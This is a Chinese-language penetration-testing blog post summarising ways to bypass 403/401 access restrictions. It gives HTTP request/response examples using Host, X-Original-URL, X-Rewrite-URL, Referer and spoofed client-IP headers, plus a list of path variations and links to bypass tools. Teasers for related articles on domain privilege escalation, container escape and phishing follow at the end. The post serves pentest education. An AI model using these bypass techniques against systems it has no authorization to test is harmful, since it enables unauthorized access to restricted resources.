干貨 | 滲透中403/401頁面繞過的思路總結

VSole2022-08-29 19:11:45

0x01 前言

做滲透時經常會碰到掃到的資產403的情況，特別是資產微乎其微的情況下，面試有時也會問到，這里做個總結！

0x02 利用姿勢

1.端口利用

掃描主機端口，找其它開放web服務的端口，訪問其端口，挑軟柿子。

2.修改HOST

Host在請求頭中的作用：在一般情況下，幾個網站可能會部署在同一個服務器上，或者幾個web系統共享一個服務器，通過host頭來指定應該由哪個網站或者web系統來處理用戶的請求。而很多WEB應用通過獲取HTTP HOST頭來獲得當前請求訪問的位置，但是很多開發人員并未意識到HTTP HOST頭由用戶控制，從安全角度來講，任何用戶輸入都是認為不安全的。

修改客戶端請求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進行繞過二級域名；首先對該目標域名進行子域名收集，整理好子域名資產（host字段同樣支持IP地址）。先Fuzz測試跑一遍收集到的子域名，這里使用的是Burp的Intruder功能。若看到一個服務端返回200的狀態碼，即表面成功找到一個在HOST白名單中的子域名。我們利用firefox插件來修改HOST值，成功繞過訪問限制。

3.覆蓋請求URL

嘗試使用X-Original-URL和X-Rewrite-URL標頭繞過Web服務器的限制。通過支持X-Original-URL和X-Rewrite-URL標頭，用戶可以使用這倆請求標頭覆蓋請求URL中的路徑，嘗試繞過對更高級別的緩存和Web服務器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden
Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK
或者：
Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK

4.Referer標頭繞過

嘗試使用Referer標頭繞過Web服務器的限制。

介紹：Referer請求頭包含了當前請求頁面的來源頁面的地址，即表示當前頁面是通過此來源頁面里的鏈接進入的。服務端一般使用Referer請求頭識別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden
Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK
或者
Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

5.代理IP

一般開發者會通過Nginx代理識別訪問端IP限制對接口的訪問，嘗試使用X-Forwarded-For、X-Forwared-Host等標頭繞過Web服務器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
如：
Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized
Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK

6.擴展名繞過

基于擴展名，用于繞過403受限制的目錄。

site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200

7.掃描的時候

遇到403了，上目錄掃描工具，掃目錄，掃文件（記住，掃描的時候要打開探測403，因為有些網站的目錄沒有權限訪問會顯示403，但是在這個目錄下面的文件，我們或許能掃描到并訪問）

8.最后補充再一些401和403 bypass的tips（由HACK學習整理補充）

Github上一些bypass 403的腳本

https://github.com/sting8k/BurpSuite_403Bypasser
https://github.com/yunemse48/403bypasser
https://github.com/devploit/dontgo403
https://github.com/daffainfo/bypass-403

以及403bypass的wiki

https://kathan19.gitbook.io/howtohunt/status-code-bypass/403bypass

hostadmin

撤稿糾錯

本作品采用《CC 協議》，轉載必須注明作者和本文鏈接

vulnhub 靶場 napping

2022-09-29 07:34:39

信息收集主機發現：sudo nmap -sn 192.168.56.1/24. -sC Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.-sV Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.-p This option specifies which ports you want to scan and overrides the default. Individual port numbers are OK, as are ranges separated by a hyphen . The beginning and/or end values of a range may be omitted, causing Nmap to use 1 and 65535, respectively. So you can specify -p- to scan ports from 1 through 65535. Scanning port zero is allowed if

通讀審計之信呼OA

2021-10-21 09:39:45

信呼OA是一款自主MVC的辦公系統，官網：http://www.rockoa.com/

干貨分享 | 域內提權之sAMAccountName欺騙

2022-08-16 07:08:33

如果從PowerShell控制臺執行操作，Shitsecure開發了一個PowerShell腳本Invoke-noPac，它將.NET 程序集noPac嵌入到base64中，由于該工具實際上是noPac，因此可以使用相同的參數來檢索票證Import-Module .\Invoke-noPAC.ps1. 使用PowerSploit的Set-DomainObject從已創建的機器帳戶中刪除服務主體名稱值是微不足道的Set-DomainObject?由于TGT已存儲在內存中，因此可以使用S4U2self kerberos擴展代表域管理員請求服務票證，由于原始票據屬于dc用戶，但由于sam帳戶名稱已被重命名，因此Kerberos將查找dc$，它是一個有效的機器帳戶，并將為所請求的服務簽發票據./Rubeu

域內提權之sAMAccountName欺騙

2022-05-13 06:56:46

與標準用戶帳戶相比計算機帳戶的名稱末尾附加了$符號，默認情況下Microsoft操作系統缺乏可以防止許多攻擊的安全控制和強化措施，此外多年來已經證明Windows生態系統中許多事物工作方式可以通過利用現有功能和工作流程來實現濫用具體來說，活動目錄中的每個帳戶在sAMAccountName屬性中都有自己的名稱，但是由于沒有控制導致可以任意使用，因此任何擁有控制權和對象(即機器帳戶)的用戶都可以修

The Route to Host：從內核提權到容器逃逸

2022-03-07 14:18:55

目前Linux內核代碼已經達到了2700萬行量級[2]，僅每年通報的Linux內核漏洞就多達數十個。Linux內核主要使用C語言編寫，由于C語言不是類型安全語言，而且偏底層，所以各種內存破壞類漏洞層出不窮。攻擊者利用內核漏洞可以達到本地提權的目的。容器技術本身依賴于Linux內核提供的Namespaces和Cgroups機制，利用內核漏洞，攻擊者可以繞過Namespaces對資源的隔離，達到逃逸的

PowerView：橫向移動

2021-09-29 05:48:48

使用SharpHound.ps1的Invoke-BloodHound 或者使用SharpHound.exe。兩者都可以反射性地運行，在這里得到它們。下面的例子使用PowerShell的變體，但參數是相同的。

社會工程學 | gophish批量發送郵件配置

2023-01-30 15:18:08

聲明：本人堅決反對利用文章內容進行惡意攻擊行為，一切錯誤行為必將受到懲罰，綠色網絡需要靠我們共同維護，推薦大

干貨 | 紅隊滲透系列之獲取入口打點總結

2023-05-24 10:24:11

驗證子域郵箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源滲透物理滲透、物理攻擊、近源滲透，這幾個的意思都是在接近目標進行安全測試。Wi-Fi網線沒有終端準入控制，直接插網線 DHCP 獲取 IP。Bad USBBlack Hat 上提出 Bad USB。社會工程學在信息收集過程中就開始。釣魚本質是利用人的信任。Windows 主機FTP服務端開啟 FTP 服務。使用 certutil 下載的文件會原封不動在?目錄下保存一份，文件名位隨機字符，使用 delete 可以刪除剛下載的緩存。

推薦一款YYDS內網橫向滲透輔助工具

2023-04-21 10:32:10

主要功能配合使用工具(如Mimikatz)掃描本地密碼，并將密碼寫入source/pass_list.txt 以下工具(1)簡稱(1)(1)檢測域。檢測到域后，工具 (2)自動使用 “net user /domain”等語法檢測判斷域用戶(3)探索其他存活域主機：自動將網段IP信息寫入source/ip_list.txt)語法：for /L %I in (1,1,254) DO @ping -w

靶機Agile補充圖片

2023-03-22 10:04:15

Nmap done: 1 IP address scanned in 171.68 seconds. 添加host└─# echo "10.10.11.203 superpass.htb" >> /etc/hosts. 注冊個賬號就讀取了。我們可以在 python 中創建一個腳本，自動實現這個過程，只需要輸入的文件路徑└─# cat lfi.py. data = {"username": "123", "password": "123", "submit": ""}

VSole

網絡安全專家